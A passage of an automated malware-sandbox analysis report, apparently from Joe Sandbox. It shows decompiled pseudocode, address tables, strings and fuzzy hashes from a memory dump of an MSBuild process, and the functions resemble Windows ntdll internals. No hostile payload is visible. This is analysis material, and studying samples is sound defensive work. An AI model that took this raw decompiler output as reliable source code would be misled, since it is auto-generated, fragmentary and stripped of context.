                                            															if(_t118 < 0) {
                                            																L67:
                                            																_t130 = 0xc0000017;
                                            																goto L32;
                                            															} else {
                                            																__eflags = _v12;
                                            																if(_v12 == 0) {
                                            																	goto L67;
                                            																} else {
                                            																	_t153 =  *0x10f8638; // 0x0
                                            																	_t122 = L010138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                            																	_t154 = _v12;
                                            																	_t130 = _t122;
                                            																	__eflags = _t130;
                                            																	if(_t130 >= 0) {
                                            																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                            																		__eflags = _t123;
                                            																		if(_t123 != 0) {
                                            																			_t155 = _a12;
                                            																			__eflags = _t155;
                                            																			if(_t155 != 0) {
                                            																				 *_t155 = _t123;
                                            																			}
                                            																			goto L64;
                                            																		} else {
                                            																			E010176E2(_t154);
                                            																			goto L41;
                                            																		}
                                            																	} else {
                                            																		E010176E2(_t154);
                                            																		_t177 = 0;
                                            																		goto L18;
                                            																	}
                                            																}
                                            															}
                                            														} else {
                                            															__eflags =  *_t176;
                                            															if( *_t176 != 0) {
                                            																goto L56;
                                            															} else {
                                            																__eflags =  *(_t176 + 2);
                                            																if( *(_t176 + 2) == 0) {
                                            																	goto L64;
                                            																} else {
                                            																	goto L56;
                                            																}
                                            															}
                                            														}
                                            													} else {
                                            														_t130 = 0xc000000d;
                                            														goto L32;
                                            													}
                                            												}
                                            												goto L35;
                                            											} else {
                                            												__eflags = _a8;
                                            												if(_a8 != 0) {
                                            													_t77 = 0xc000000d;
                                            												} else {
                                            													_v5 = 1;
                                            													L0103FCE3(_v20, _t170);
                                            													_t177 = 0;
                                            													__eflags = 0;
                                            													L15:
                                            													_t85 =  *[fs:0x18];
                                            													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                            													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                            														L18:
                                            														__eflags = _t130;
                                            														if(_t130 != 0) {
                                            															goto L32;
                                            														} else {
                                            															__eflags = _v5 - _t130;
                                            															if(_v5 == _t130) {
                                            																goto L32;
                                            															} else {
                                            																_t86 =  *[fs:0x18];
                                            																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                            																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                            																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                            																}
                                            																__eflags = _t177;
                                            																if(_t177 == 0) {
                                            																	L31:
                                            																	__eflags = 0;
                                            																	L010170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                            																	goto L32;
                                            																} else {
                                            																	__eflags = _v24;
                                            																	_t91 =  *(_t177 + 0x20);
                                            																	if(_v24 != 0) {
                                            																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                            																		goto L31;
                                            																	} else {
                                            																		_t141 = _t91 & 0x00000040;
                                            																		__eflags = _t170 & 0x00000100;
                                            																		if((_t170 & 0x00000100) == 0) {
                                            																			__eflags = _t141;
                                            																			if(_t141 == 0) {
                                            																				L74:
                                            																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                            																				goto L27;
                                            																			} else {
                                            																				_t177 = E0103FD22(_t177);
                                            																				__eflags = _t177;
                                            																				if(_t177 == 0) {
                                            																					goto L42;
                                            																				} else {
                                            																					_t130 = E0103FD9B(_t177, 0, 4);
                                            																					__eflags = _t130;
                                            																					if(_t130 != 0) {
                                            																						goto L42;
                                            																					} else {
                                            																						_t68 = _t177 + 0x20;
                                            																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                            																						__eflags =  *_t68;
                                            																						_t91 =  *(_t177 + 0x20);
                                            																						goto L74;
                                            																					}
                                            																				}
                                            																			}
                                            																			goto L35;
                                            																		} else {
                                            																			__eflags = _t141;
                                            																			if(_t141 != 0) {
                                            																				_t177 = E0103FD22(_t177);
                                            																				__eflags = _t177;
                                            																				if(_t177 == 0) {
                                            																					L42:
                                            																					_t77 = 0xc0000001;
                                            																					goto L33;
                                            																				} else {
                                            																					_t130 = E0103FD9B(_t177, 0, 4);
                                            																					__eflags = _t130;
                                            																					if(_t130 != 0) {
                                            																						goto L42;
                                            																					} else {
                                            																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                            																						_t91 =  *(_t177 + 0x20);
                                            																						goto L26;
                                            																					}
                                            																				}
                                            																				goto L35;
                                            																			} else {
                                            																				L26:
                                            																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                            																				__eflags = _t94;
                                            																				L27:
                                            																				 *(_t177 + 0x20) = _t94;
                                            																				__eflags = _t170 & 0x00008000;
                                            																				if((_t170 & 0x00008000) != 0) {
                                            																					_t95 = _a12;
                                            																					__eflags = _t95;
                                            																					if(_t95 != 0) {
                                            																						_t96 =  *_t95;
                                            																						__eflags = _t96;
                                            																						if(_t96 != 0) {
                                            																							 *((short*)(_t177 + 0x22)) = 0;
                                            																							_t40 = _t177 + 0x20;
                                            																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                            																							__eflags =  *_t40;
                                            																						}
                                            																					}
                                            																				}
                                            																				goto L31;
                                            																			}
                                            																		}
                                            																	}
                                            																}
                                            															}
                                            														}
                                            													} else {
                                            														_t147 =  *( *[fs:0x18] + 0xfc0);
                                            														_t106 =  *(_t147 + 0x20);
                                            														__eflags = _t106 & 0x00000040;
                                            														if((_t106 & 0x00000040) != 0) {
                                            															_t147 = E0103FD22(_t147);
                                            															__eflags = _t147;
                                            															if(_t147 == 0) {
                                            																L41:
                                            																_t130 = 0xc0000001;
                                            																L32:
                                            																_t77 = _t130;
                                            																goto L33;
                                            															} else {
                                            																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                            																_t106 =  *(_t147 + 0x20);
                                            																goto L17;
                                            															}
                                            															goto L35;
                                            														} else {
                                            															L17:
                                            															_t108 = _t106 | 0x00000080;
                                            															__eflags = _t108;
                                            															 *(_t147 + 0x20) = _t108;
                                            															 *( *[fs:0x18] + 0xfc0) = _t147;
                                            															goto L18;
                                            														}
                                            													}
                                            												}
                                            											}
                                            											L33:
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L35:
                                            						return _t77;
                                            					} else {
                                            						 *_t75 = 0x10f7b80;
                                            						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                            						 *_t134 = _t75;
                                            						 *0x10f7b84 = _t75;
                                            						_t73 = E0101EB70(_t134, 0x10f7b60);
                                            						if( *0x10f7b20 != 0) {
                                            							_t73 =  *( *[fs:0x30] + 0xc);
                                            							if( *((char*)(_t73 + 0x28)) == 0) {
                                            								_t73 = E0101FF60( *0x10f7b20);
                                            							}
                                            						}
                                            						goto L5;
                                            					}
                                            				}
                                            			}

















































                                            0x0103fab0
                                            0x0103fab2
                                            0x0103fab3
                                            0x0103fab4
                                            0x0103fabc
                                            0x0103fac0
                                            0x0103fb14
                                            0x0103fb17
                                            0x0103fac2
                                            0x0103fac8
                                            0x0103facd
                                            0x0103fad3
                                            0x0103fad3
                                            0x0103fadd
                                            0x0103fb18
                                            0x0103fb1b
                                            0x0103fb1d
                                            0x0103fb1e
                                            0x0103fb1f
                                            0x0103fb20
                                            0x0103fb21
                                            0x0103fb22
                                            0x0103fb23
                                            0x0103fb24
                                            0x0103fb25
                                            0x0103fb26
                                            0x0103fb27
                                            0x0103fb28
                                            0x0103fb29
                                            0x0103fb2a
                                            0x0103fb2b
                                            0x0103fb2c
                                            0x0103fb2d
                                            0x0103fb2e
                                            0x0103fb2f
                                            0x0103fb3a
                                            0x0103fb3b
                                            0x0103fb3e
                                            0x0103fb41
                                            0x0103fb44
                                            0x0103fb47
                                            0x0103fb4a
                                            0x0103fb4d
                                            0x0103fb53
                                            0x0107bdcb
                                            0x0107bdcb
                                            0x0103fb59
                                            0x0103fb5b
                                            0x0103fb5b
                                            0x0103fb5e
                                            0x0107bdd5
                                            0x0107bdd8
                                            0x00000000
                                            0x0107bdda
                                            0x00000000
                                            0x0107bdda
                                            0x0103fb64
                                            0x0103fb64
                                            0x0103fb64
                                            0x0103fb67
                                            0x0103fb6e
                                            0x0103fb70
                                            0x0103fb72
                                            0x00000000
                                            0x0103fb78
                                            0x0103fb7a
                                            0x0103fb7a
                                            0x0103fb7d
                                            0x0103fb80
                                            0x0107bddf
                                            0x0107bde1
                                            0x00000000
                                            0x0107bde3
                                            0x00000000
                                            0x0107bde3
                                            0x0103fb86
                                            0x0103fb86
                                            0x0103fb86
                                            0x0103fb8b
                                            0x0103fb90
                                            0x0103fb92
                                            0x0103fb94
                                            0x0103fb9a
                                            0x0103fb9b
                                            0x0103fba1
                                            0x0107bde8
                                            0x0107bdeb
                                            0x0107bded
                                            0x0107beb5
                                            0x0107beb5
                                            0x0107bebb
                                            0x0107bebd
                                            0x0107bec3
                                            0x0107bed2
                                            0x0107bedd
                                            0x0107bedd
                                            0x0107beed
                                            0x00000000
                                            0x0107bdf3
                                            0x0107bdfe
                                            0x0107be06
                                            0x0107be0b
                                            0x0107be0d
                                            0x0107be0f
                                            0x0107be14
                                            0x0107be19
                                            0x0107be20
                                            0x0107be25
                                            0x0107be27
                                            0x0107be35
                                            0x0107be39
                                            0x0107be46
                                            0x0107be4f
                                            0x0107be54
                                            0x0107be56
                                            0x0107bef8
                                            0x0107bef8
                                            0x00000000
                                            0x0107be5c
                                            0x0107be5c
                                            0x0107be60
                                            0x00000000
                                            0x0107be66
                                            0x0107be66
                                            0x0107be7f
                                            0x0107be84
                                            0x0107be87
                                            0x0107be89
                                            0x0107be8b
                                            0x0107be99
                                            0x0107be9d
                                            0x0107bea0
                                            0x0107beac
                                            0x0107beaf
                                            0x0107beb1
                                            0x0107beb3
                                            0x0107beb3
                                            0x00000000
                                            0x0107bea2
                                            0x0107bea2
                                            0x00000000
                                            0x0107bea2
                                            0x0107be8d
                                            0x0107be8d
                                            0x0107be92
                                            0x00000000
                                            0x0107be92
                                            0x0107be8b
                                            0x0107be60
                                            0x0107be3b
                                            0x0107be3b
                                            0x0107be3e
                                            0x00000000
                                            0x0107be40
                                            0x0107be40
                                            0x0107be44
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0107be44
                                            0x0107be3e
                                            0x0107be29
                                            0x0107be29
                                            0x00000000
                                            0x0107be29
                                            0x0107be27
                                            0x00000000
                                            0x0103fba7
                                            0x0103fba7
                                            0x0103fbab
                                            0x0107bf02
                                            0x0103fbb1
                                            0x0103fbb1
                                            0x0103fbb8
                                            0x0103fbbd
                                            0x0103fbbd
                                            0x0103fbbf
                                            0x0103fbbf
                                            0x0103fbc5
                                            0x0103fbcb
                                            0x0103fbf8
                                            0x0103fbf8
                                            0x0103fbfa
                                            0x00000000
                                            0x0103fc00
                                            0x0103fc00
                                            0x0103fc03
                                            0x00000000
                                            0x0103fc09
                                            0x0103fc09
                                            0x0103fc0f
                                            0x0103fc15
                                            0x0103fc23
                                            0x0103fc23
                                            0x0103fc25
                                            0x0103fc27
                                            0x0103fc75
                                            0x0103fc7c
                                            0x0103fc84
                                            0x00000000
                                            0x0103fc29
                                            0x0103fc29
                                            0x0103fc2d
                                            0x0103fc30
                                            0x0107bf0f
                                            0x00000000
                                            0x0103fc36
                                            0x0103fc38
                                            0x0103fc3b
                                            0x0103fc41
                                            0x0107bf17
                                            0x0107bf19
                                            0x0107bf48
                                            0x0107bf4b
                                            0x00000000
                                            0x0107bf1b
                                            0x0107bf22
                                            0x0107bf24
                                            0x0107bf26
                                            0x00000000
                                            0x0107bf2c
                                            0x0107bf37
                                            0x0107bf39
                                            0x0107bf3b
                                            0x00000000
                                            0x0107bf41
                                            0x0107bf41
                                            0x0107bf41
                                            0x0107bf41
                                            0x0107bf45
                                            0x00000000
                                            0x0107bf45
                                            0x0107bf3b
                                            0x0107bf26
                                            0x00000000
                                            0x0103fc47
                                            0x0103fc47
                                            0x0103fc49
                                            0x0103fcb2
                                            0x0103fcb4
                                            0x0103fcb6
                                            0x0103fcdc
                                            0x0103fcdc
                                            0x00000000
                                            0x0103fcb8
                                            0x0103fcc3
                                            0x0103fcc5
                                            0x0103fcc7
                                            0x00000000
                                            0x0103fcc9
                                            0x0103fcc9
                                            0x0103fccd
                                            0x00000000
                                            0x0103fccd
                                            0x0103fcc7
                                            0x00000000
                                            0x0103fc4b
                                            0x0103fc4b
                                            0x0103fc4e
                                            0x0103fc4e
                                            0x0103fc51
                                            0x0103fc51
                                            0x0103fc54
                                            0x0103fc5a
                                            0x0103fc5c
                                            0x0103fc5f
                                            0x0103fc61
                                            0x0103fc63
                                            0x0103fc65
                                            0x0103fc67
                                            0x0103fc6e
                                            0x0103fc72
                                            0x0103fc72
                                            0x0103fc72
                                            0x0103fc72
                                            0x0103fc67
                                            0x0103fc61
                                            0x00000000
                                            0x0103fc5a
                                            0x0103fc49
                                            0x0103fc41
                                            0x0103fc30
                                            0x0103fc27
                                            0x0103fc03
                                            0x0103fbcd
                                            0x0103fbd3
                                            0x0103fbd9
                                            0x0103fbdc
                                            0x0103fbde
                                            0x0103fc99
                                            0x0103fc9b
                                            0x0103fc9d
                                            0x0103fcd5
                                            0x0103fcd5
                                            0x0103fc89
                                            0x0103fc89
                                            0x00000000
                                            0x0103fc9f
                                            0x0103fc9f
                                            0x0103fca3
                                            0x00000000
                                            0x0103fca3
                                            0x00000000
                                            0x0103fbe4
                                            0x0103fbe4
                                            0x0103fbe4
                                            0x0103fbe4
                                            0x0103fbe9
                                            0x0103fbf2
                                            0x00000000
                                            0x0103fbf2
                                            0x0103fbde
                                            0x0103fbcb
                                            0x0103fbab
                                            0x0103fc8b
                                            0x0103fc8b
                                            0x0103fc8c
                                            0x0103fb80
                                            0x0103fb72
                                            0x0103fb5e
                                            0x0103fc8d
                                            0x0103fc91
                                            0x0103fadf
                                            0x0103fadf
                                            0x0103fae1
                                            0x0103fae4
                                            0x0103fae7
                                            0x0103faec
                                            0x0103faf8
                                            0x0103fb00
                                            0x0103fb07
                                            0x0103fb0f
                                            0x0103fb0f
                                            0x0103fb07
                                            0x00000000
                                            0x0103faf8
                                            0x0103fadd

                                            Strings
                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0107BE0F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                            • API String ID: 0-865735534
                                            • Opcode ID: a139ef4471944b6cd4c460314bc0bc53a722084fa1ccb4665f6d596269239023
                                            • Instruction ID: e9b08a8783724422d37cc0f367e4a2b945f84c808cb6aff495787aaa6ebc5032
                                            • Opcode Fuzzy Hash: a139ef4471944b6cd4c460314bc0bc53a722084fa1ccb4665f6d596269239023
                                            • Instruction Fuzzy Hash: 1CA1F471F0060B8FEB65DB68C454BBAB7E9AF84710F0445A9E9C6DB781DB34D801CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 63%
                                            			E01002D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                            				signed char _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				signed int _v52;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr _t55;
                                            				signed int _t57;
                                            				signed int _t58;
                                            				char* _t62;
                                            				signed char* _t63;
                                            				signed char* _t64;
                                            				signed int _t67;
                                            				signed int _t72;
                                            				signed int _t77;
                                            				signed int _t78;
                                            				signed int _t88;
                                            				intOrPtr _t89;
                                            				signed char _t93;
                                            				signed int _t97;
                                            				signed int _t98;
                                            				signed int _t102;
                                            				signed int _t103;
                                            				intOrPtr _t104;
                                            				signed int _t105;
                                            				signed int _t106;
                                            				signed char _t109;
                                            				signed int _t111;
                                            				void* _t116;
                                            
                                            				_t102 = __edi;
                                            				_t97 = __edx;
                                            				_v12 = _v12 & 0x00000000;
                                            				_t55 =  *[fs:0x18];
                                            				_t109 = __ecx;
                                            				_v8 = __edx;
                                            				_t86 = 0;
                                            				_v32 = _t55;
                                            				_v24 = 0;
                                            				_push(__edi);
                                            				if(__ecx == 0x10f5350) {
                                            					_t86 = 1;
                                            					_v24 = 1;
                                            					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                            				}
                                            				_t103 = _t102 | 0xffffffff;
                                            				if( *0x10f7bc8 != 0) {
                                            					_push(0xc000004b);
                                            					_push(_t103);
                                            					E010497C0();
                                            				}
                                            				if( *0x10f79c4 != 0) {
                                            					_t57 = 0;
                                            				} else {
                                            					_t57 = 0x10f79c8;
                                            				}
                                            				_v16 = _t57;
                                            				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                            					_t93 = _t109;
                                            					L23();
                                            				}
                                            				_t58 =  *_t109;
                                            				if(_t58 == _t103) {
                                            					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                            					_t58 = _t103;
                                            					if(__eflags == 0) {
                                            						_t93 = _t109;
                                            						E01031624(_t86, __eflags);
                                            						_t58 =  *_t109;
                                            					}
                                            				}
                                            				_v20 = _v20 & 0x00000000;
                                            				if(_t58 != _t103) {
                                            					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                            				}
                                            				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                            				_t88 = _v16;
                                            				_v28 = _t104;
                                            				L9:
                                            				while(1) {
                                            					if(E01027D50() != 0) {
                                            						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                            					} else {
                                            						_t62 = 0x7ffe0382;
                                            					}
                                            					if( *_t62 != 0) {
                                            						_t63 =  *[fs:0x30];
                                            						__eflags = _t63[0x240] & 0x00000002;
                                            						if((_t63[0x240] & 0x00000002) != 0) {
                                            							_t93 = _t109;
                                            							E0109FE87(_t93);
                                            						}
                                            					}
                                            					if(_t104 != 0xffffffff) {
                                            						_push(_t88);
                                            						_push(0);
                                            						_push(_t104);
                                            						_t64 = E01049520();
                                            						goto L15;
                                            					} else {
                                            						while(1) {
                                            							_t97 =  &_v8;
                                            							_t64 = E0103E18B(_t109 + 4, _t97, 4, _t88, 0);
                                            							if(_t64 == 0x102) {
                                            								break;
                                            							}
                                            							_t93 =  *(_t109 + 4);
                                            							_v8 = _t93;
                                            							if((_t93 & 0x00000002) != 0) {
                                            								continue;
                                            							}
                                            							L15:
                                            							if(_t64 == 0x102) {
                                            								break;
                                            							}
                                            							_t89 = _v24;
                                            							if(_t64 < 0) {
                                            								L0105DF30(_t93, _t97, _t64);
                                            								_push(_t93);
                                            								_t98 = _t97 | 0xffffffff;
                                            								__eflags =  *0x10f6901;
                                            								_push(_t109);
                                            								_v52 = _t98;
                                            								if( *0x10f6901 != 0) {
                                            									_push(0);
                                            									_push(1);
                                            									_push(0);
                                            									_push(0x100003);
                                            									_push( &_v12);
                                            									_t72 = E01049980();
                                            									__eflags = _t72;
                                            									if(_t72 < 0) {
                                            										_v12 = _t98 | 0xffffffff;
                                            									}
                                            								}
                                            								asm("lock cmpxchg [ecx], edx");
                                            								_t111 = 0;
                                            								__eflags = 0;
                                            								if(0 != 0) {
                                            									__eflags = _v12 - 0xffffffff;
                                            									if(_v12 != 0xffffffff) {
                                            										_push(_v12);
                                            										E010495D0();
                                            									}
                                            								} else {
                                            									_t111 = _v12;
                                            								}
                                            								return _t111;
                                            							} else {
                                            								if(_t89 != 0) {
                                            									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                            									_t77 = E01027D50();
                                            									__eflags = _t77;
                                            									if(_t77 == 0) {
                                            										_t64 = 0x7ffe0384;
                                            									} else {
                                            										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                            									}
                                            									__eflags =  *_t64;
                                            									if( *_t64 != 0) {
                                            										_t64 =  *[fs:0x30];
                                            										__eflags = _t64[0x240] & 0x00000004;
                                            										if((_t64[0x240] & 0x00000004) != 0) {
                                            											_t78 = E01027D50();
                                            											__eflags = _t78;
                                            											if(_t78 == 0) {
                                            												_t64 = 0x7ffe0385;
                                            											} else {
                                            												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                            											}
                                            											__eflags =  *_t64 & 0x00000020;
                                            											if(( *_t64 & 0x00000020) != 0) {
                                            												_t64 = E01087016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                            											}
                                            										}
                                            									}
                                            								}
                                            								return _t64;
                                            							}
                                            						}
                                            						_t97 = _t88;
                                            						_t93 = _t109;
                                            						E0109FDDA(_t97, _v12);
                                            						_t105 =  *_t109;
                                            						_t67 = _v12 + 1;
                                            						_v12 = _t67;
                                            						__eflags = _t105 - 0xffffffff;
                                            						if(_t105 == 0xffffffff) {
                                            							_t106 = 0;
                                            							__eflags = 0;
                                            						} else {
                                            							_t106 =  *(_t105 + 0x14);
                                            						}
                                            						__eflags = _t67 - 2;
                                            						if(_t67 > 2) {
                                            							__eflags = _t109 - 0x10f5350;
                                            							if(_t109 != 0x10f5350) {
                                            								__eflags = _t106 - _v20;
                                            								if(__eflags == 0) {
                                            									_t93 = _t109;
                                            									E0109FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                            								}
                                            							}
                                            						}
                                            						_push("RTL: Re-Waiting\n");
                                            						_push(0);
                                            						_push(0x65);
                                            						_v20 = _t106;
                                            						E01095720();
                                            						_t104 = _v28;
                                            						_t116 = _t116 + 0xc;
                                            						continue;
                                            					}
                                            				}
                                            			}




































                                            0x01002d8a
                                            0x01002d8a
                                            0x01002d92
                                            0x01002d96
                                            0x01002d9e
                                            0x01002da0
                                            0x01002da3
                                            0x01002da5
                                            0x01002da8
                                            0x01002dab
                                            0x01002db2
                                            0x0105f9aa
                                            0x0105f9ab
                                            0x0105f9ae
                                            0x0105f9ae
                                            0x01002db8
                                            0x01002dc2
                                            0x0105f9b9
                                            0x0105f9be
                                            0x0105f9bf
                                            0x0105f9bf
                                            0x01002dcf
                                            0x0105f9c9
                                            0x01002dd5
                                            0x01002dd5
                                            0x01002dd5
                                            0x01002dde
                                            0x01002de1
                                            0x01002e70
                                            0x01002e72
                                            0x01002e72
                                            0x01002de7
                                            0x01002deb
                                            0x01002e7c
                                            0x01002e83
                                            0x01002e85
                                            0x01002e8b
                                            0x01002e8d
                                            0x01002e92
                                            0x01002e92
                                            0x01002e85
                                            0x01002df1
                                            0x01002df7
                                            0x01002df9
                                            0x01002df9
                                            0x01002dfc
                                            0x01002dff
                                            0x01002e02
                                            0x00000000
                                            0x01002e05
                                            0x01002e0c
                                            0x0105f9d9
                                            0x01002e12
                                            0x01002e12
                                            0x01002e12
                                            0x01002e1a
                                            0x0105f9e3
                                            0x0105f9e9
                                            0x0105f9f0
                                            0x0105f9f6
                                            0x0105f9f8
                                            0x0105f9f8
                                            0x0105f9f0
                                            0x01002e23
                                            0x0105fa02
                                            0x0105fa03
                                            0x0105fa05
                                            0x0105fa06
                                            0x00000000
                                            0x01002e29
                                            0x01002e29
                                            0x01002e2e
                                            0x01002e34
                                            0x01002e3e
                                            0x00000000
                                            0x00000000
                                            0x01002e44
                                            0x01002e47
                                            0x01002e4d
                                            0x00000000
                                            0x00000000
                                            0x01002e4f
                                            0x01002e54
                                            0x00000000
                                            0x00000000
                                            0x01002e5a
                                            0x01002e5f
                                            0x01002e9a
                                            0x01002ea4
                                            0x01002ea5
                                            0x01002ea8
                                            0x01002eaf
                                            0x01002eb2
                                            0x01002eb5
                                            0x0105fae9
                                            0x0105faeb
                                            0x0105faed
                                            0x0105faef
                                            0x0105faf7
                                            0x0105faf8
                                            0x0105fafd
                                            0x0105faff
                                            0x0105fb04
                                            0x0105fb04
                                            0x0105faff
                                            0x01002ec0
                                            0x01002ec4
                                            0x01002ec6
                                            0x01002ec8
                                            0x0105fb14
                                            0x0105fb18
                                            0x0105fb1e
                                            0x0105fb21
                                            0x0105fb21
                                            0x01002ece
                                            0x01002ece
                                            0x01002ece
                                            0x01002ed7
                                            0x01002e61
                                            0x01002e63
                                            0x0105fa6b
                                            0x0105fa71
                                            0x0105fa76
                                            0x0105fa78
                                            0x0105fa8a
                                            0x0105fa7a
                                            0x0105fa83
                                            0x0105fa83
                                            0x0105fa8f
                                            0x0105fa91
                                            0x0105fa97
                                            0x0105fa9d
                                            0x0105faa4
                                            0x0105faaa
                                            0x0105faaf
                                            0x0105fab1
                                            0x0105fac3
                                            0x0105fab3
                                            0x0105fabc
                                            0x0105fabc
                                            0x0105fac8
                                            0x0105facb
                                            0x0105fadf
                                            0x0105fadf
                                            0x0105facb
                                            0x0105faa4
                                            0x0105fa91
                                            0x01002e6f
                                            0x01002e6f
                                            0x01002e5f
                                            0x0105fa13
                                            0x0105fa15
                                            0x0105fa17
                                            0x0105fa1f
                                            0x0105fa21
                                            0x0105fa22
                                            0x0105fa25
                                            0x0105fa28
                                            0x0105fa2f
                                            0x0105fa2f
                                            0x0105fa2a
                                            0x0105fa2a
                                            0x0105fa2a
                                            0x0105fa31
                                            0x0105fa34
                                            0x0105fa36
                                            0x0105fa3c
                                            0x0105fa3e
                                            0x0105fa41
                                            0x0105fa43
                                            0x0105fa45
                                            0x0105fa45
                                            0x0105fa41
                                            0x0105fa3c
                                            0x0105fa4a
                                            0x0105fa4f
                                            0x0105fa51
                                            0x0105fa53
                                            0x0105fa56
                                            0x0105fa5b
                                            0x0105fa5e
                                            0x00000000
                                            0x0105fa5e
                                            0x01002e23

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Re-Waiting
                                            • API String ID: 0-316354757
                                            • Opcode ID: 61c11fb9a3856ba587bf4b441b826b744fb2475b2dde1b37709519750872761b
                                            • Instruction ID: 946c9b15266a19513d454131275b1eb5fc36ef0315ea82b863b21788a135751d
                                            • Opcode Fuzzy Hash: 61c11fb9a3856ba587bf4b441b826b744fb2475b2dde1b37709519750872761b
                                            • Instruction Fuzzy Hash: DD612471A006469BEB63DB6CC848BBF7BE5EB44714F1406AAE9D1972C1C7389D40C782
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E010D0EA5(void* __ecx, void* __edx) {
                                            				signed int _v20;
                                            				char _v24;
                                            				intOrPtr _v28;
                                            				unsigned int _v32;
                                            				signed int _v36;
                                            				intOrPtr _v40;
                                            				char _v44;
                                            				intOrPtr _v64;
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed int _t58;
                                            				unsigned int _t60;
                                            				intOrPtr _t62;
                                            				char* _t67;
                                            				char* _t69;
                                            				void* _t80;
                                            				void* _t83;
                                            				intOrPtr _t93;
                                            				intOrPtr _t115;
                                            				char _t117;
                                            				void* _t120;
                                            
                                            				_t83 = __edx;
                                            				_t117 = 0;
                                            				_t120 = __ecx;
                                            				_v44 = 0;
                                            				if(E010CFF69(__ecx,  &_v44,  &_v32) < 0) {
                                            					L24:
                                            					_t109 = _v44;
                                            					if(_v44 != 0) {
                                            						E010D1074(_t83, _t120, _t109, _t117, _t117);
                                            					}
                                            					L26:
                                            					return _t117;
                                            				}
                                            				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                            				_t5 = _t83 + 1; // 0x1
                                            				_v36 = _t5 << 0xc;
                                            				_v40 = _t93;
                                            				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                            				asm("sbb ebx, ebx");
                                            				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                            				if(_t58 != 0) {
                                            					_push(0);
                                            					_push(0x14);
                                            					_push( &_v24);
                                            					_push(3);
                                            					_push(_t93);
                                            					_push(0xffffffff);
                                            					_t80 = E01049730();
                                            					_t115 = _v64;
                                            					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                            						_push(_t93);
                                            						E010CA80D(_t115, 1, _v20, _t117);
                                            						_t83 = 4;
                                            					}
                                            				}
                                            				if(E010CA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                            					goto L24;
                                            				}
                                            				_t60 = _v32;
                                            				_t97 = (_t60 != 0x100000) + 1;
                                            				_t83 = (_v44 -  *0x10f8b04 >> 0x14) + (_v44 -  *0x10f8b04 >> 0x14);
                                            				_v28 = (_t60 != 0x100000) + 1;
                                            				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                            				_v40 = _t62;
                                            				if(_t83 >= _t62) {
                                            					L10:
                                            					asm("lock xadd [eax], ecx");
                                            					asm("lock xadd [eax], ecx");
                                            					if(E01027D50() == 0) {
                                            						_t67 = 0x7ffe0380;
                                            					} else {
                                            						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            					}
                                            					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            						E010C138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                            					}
                                            					if(E01027D50() == 0) {
                                            						_t69 = 0x7ffe0388;
                                            					} else {
                                            						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            					}
                                            					if( *_t69 != 0) {
